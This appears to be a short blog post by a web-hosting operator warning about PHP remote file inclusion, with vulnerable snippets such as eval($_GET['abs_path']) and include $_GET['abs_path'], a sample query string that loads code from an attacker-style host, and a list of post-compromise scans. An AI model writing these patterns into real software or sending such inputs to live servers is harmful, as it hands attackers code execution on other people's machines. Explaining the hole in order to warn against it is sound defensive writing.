I’m becoming more and more of the belief that I should REFUSE to host people who either upload other people’s code without knowing how it works, OR write poor code themselves.
Why is this?
Simple… In the last year, I’ve had two people who have uploaded code that they did not write that contained a query string that looked like this:
index.html?abs_path=http://www.jrcorps.com/
Now, that alone wouldn’t be so bad, if they didn’t have a line of code that looked like this:
eval($_GET[‘abs_path’);
or
include $_GET[‘abs_path’);
This is almost as bad:
include “/home/”. $_GET[‘abs_path’];
In any case, what am I trying to say… All of these commands allow for Remote Code Execution. All of them, can set me up for a very very bad day. Here’s what happens:
- User uploads bad code
- Enemy writes a file browser/remote system php script.
- Enemy finds User’s bad code.
- Enemy sends a line like this: ?abs_path=http://badguyssite.com/asdf.txt
- User’s code runs Enemy’s code on User’s server
- Enemy has as much control over the server as the web server does.
Now some of you are saying, “Well my webserver runs as nobody and all my permissions are setup right… What can anyone do to hurt me as user Nobody?
The short answer: probably nothing. The long answer is, if your using php, then you probably have a tmp folder… If you have a tmp folder, the enemy can then upload code to your server.
But Justin… they still can only run it as Nobody…
Yes, but nobody has the power to do somethings… For example, serve up massive amounts of data, run infinite “for” loops, or simply find a way to install a “root kit”. In any case, they can do things to make your server unusable… They might not be able to compromise data… but unusable is just as bad in some cases.
If your machine is ever compromised this way, I strongly recommend finding the hole as fast as possible and removing it from your system. Once you do, I strongly recommend you remove any code that they might have uploaded to your box. Lastly, I strongly recommend that you run a few scans on your box, including but not limited to:
- A Nessus Scan
- A RkHunter Scan
- A Virus Scan
- A Process Scan
- A Port Scan
I’ve included links to some of these to the left side.
Count down to some sort of vacation: 2 days